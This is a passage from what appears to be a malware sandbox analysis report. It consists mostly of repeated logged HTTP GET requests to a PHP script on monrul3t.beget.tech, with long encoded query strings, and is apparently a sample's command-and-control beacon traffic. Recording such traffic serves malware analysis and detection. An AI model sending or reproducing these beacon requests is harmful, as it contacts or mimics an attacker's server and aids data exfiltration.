RadXRE1UeVR0T1UlMZhmUy4UbCRlW0U1VZhXRy00MNpmT0kVbOBzaU10akRUT4l0QMlWTYJ2ZrRlTp9maJRzZU5Uaa1WTw0kaZpmVX10MJJTT5F1RaJTRyk1aGpmTsJlMOxmUtpVaO1mTsJkeO1mUql1aKlXZ2k0UZBjRHJFMohlWpd3UOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2aD90Zj1mYwJESjxmUzU1ZNRkT4F0QixmUyImTClmTntGSiBXMXl1RCNkTyc3VaBTNXN1bBlWZJRWRJdXUqxUeBNUUnFERNJTWElkVCFTUnlEVL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXSTt0QkVUS4d2QJhkTwQFRKpWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpNGROpXV610dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiIjNWYmZmYkJmMzYDMxUDM1QWO2E2MmVWOxgjYjlTZjNDNiZGO3UjN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.tech
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=d1nIiojI0Y2Y4QGNjVWMmNDNyUDNjRzY3QDZ5MjN5YTOhZDM3QmIsIyN3UWZ4gTMwADZ5QWM0kjZzQTNhJjN0MDNiJjYiljN2cTOkNTMiRDOiojIlZTY4UTOjlTYkNmZzUjZyYTZxMmNhlDM0IDZ5MmYiNmIsICNjlTN3ITM4EzN4kDOmRmYxYzY4QzNwcjNjlTY4EGN5QGZ1MGO2AjMiojI0QGOzETZiNTNwkzNkJWOzE2NjV2Y0ETY1ADZkZ2YjFmI7xSfikTMulkMBp2Tx0kaPpXQqlkNJlmWyMmeOBzZUpFeVpnTx0kaOpmTU9UMV1WWrp0VNBTWE90akR0ToRGRahmSXlVaGdlWtJlMNl2dplEbBpXTp9maJVTQU1kMrpWW5VERahmW650MJRVT1EFVNBTUUpFMjR0T61keNdXWqplaORUTwEkeOlXRqp1dJNETpV1QNl2bql0aaR0TtJkaZJTRqlFaGdVTsZEVPFTSykFbWpWTshGRNdXRq5UMjpXWsJEVZBTRX9UaK1mWyk0QMlWVD10dFpWS2k0QNFTUU1kMZRkTyUEVPtmU610dJ1mW6llaaBzZU5ENRd1TqZkaaBTQUlFaa1mTsZlaORTV61Ua3lWSvkUaPlWUql1MV1WWqZ1VNpmV61kMBpnTrxGVNpmSH9UbSdkTyklMNhXTUpVeVRVTzkFVNRTWH90MnpWSzlUeQl2bql0dnRkWxE1RadXRE1UeVR0T1UlMZhmUy4UbCRlW0U1VZhXRy00MNpmT0kVbOBzaU10akRUT4l0QMlWTYJ2ZrRlTp9maJRzZU5Uaa1WTw0kaZpmVX10MJJTT5F1RaJTRyk1aGpmTsJlMOxmUtpVaO1mTsJkeO1mUql1aKlXZ2k0UZBjRHJFMohlWpd3UOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2aD90Zj1mYwJESjxmUzU1ZNRkT4F0QixmUyImTClmTntGSiBXMXl1RCNkTyc3VaBTNXN1bBlWZJRWRJdXUqxUeBNUUnFERNJTWElkVCFTUnlEVL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXSTt0QkVUS4d2QJhkTwQFRKpWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpNGROpXV610dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiIjNWYmZmYkJmMzYDMxUDM1QWO2E2MmVWOxgjYjlTZjNDNiZGO3UjN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=d1nIiojI0Y2Y4QGNjVWMmNDNyUDNjRzY3QDZ5MjN5YTOhZDM3QmIsIyN3UWZ4gTMwADZ5QWM0kjZzQTNhJjN0MDNiJjYiljN2cTOkNTMiRDOiojIlZTY4UTOjlTYkNmZzUjZyYTZxMmNhlDM0IDZ5MmYiNmIsICNjlTN3ITM4EzN4kDOmRmYxYzY4QzNwcjNjlTY4EGN5QGZ1MGO2AjMiojI0QGOzETZiNTNwkzNkJWOzE2NjV2Y0ETY1ADZkZ2YjFmI7xSfikTMulEMRp2TyUkaPNTQqlkNJlmWyMmeOBzZUpFeVpnTx0kaOpmTU9UMV1WWrp0VNBTWE90akR0ToRGRahmSXlVaGdlWtJlMNl2dplEbBpXTp9maJVTQU1kMrpWW5VERahmW650MJRVT1EFVNBTUUpFMjR0T61keNdXWqplaORUTwEkeOlXRqp1dJNETpV1QNl2bql0aaR0TtJkaZJTRqlFaGdVTsZEVPFTSykFbWpWTshGRNdXRq5UMjpXWsJEVZBTRX9UaK1mWyk0QMlWVD10dFpWS2k0QNFTUU1kMZRkTyUEVPtmU610dJ1mW6llaaBzZU5ENRd1TqZkaaBTQUlFaa1mTsZlaORTV61Ua3lWSvkUaPlWUql1MV1WWqZ1VNpmV61kMBpnTrxGVNpmSH9UbSdkTyklMNhXTUpVeVRVTzkFVNRTWH90MnpWSzlUeQl2bql0dnRkWxE1RadXRE1UeVR0T1UlMZhmUy4UbCRlW0U1VZhXRy00MNpmT0kVbOBzaU10akRUT4l0QMlWTYJ2ZBpmTp9maJRzZU5Uaa1WTw0kaZpmVX10MJJTT5F1RaJTRyk1aGpmTsJlMOxmUtpVaO1mTsJkeO1mUql1aKlXZ2k0UZBjRHJFMohlWpd3UOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2aD90Zj1mYwJESjxmUzU1ZNRkT4F0QixmUyImTClmTntGSiBXMXl1RCNkTyc3VaBTNXN1bBlWZJRWRJdXUqxUeBNUUnFERNJTWElkVCFTUnlEVL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXSTt0QkVUS4d2QJhkTwQFRKpWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpNGROpXV610dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiIjNWYmZmYkJmMzYDMx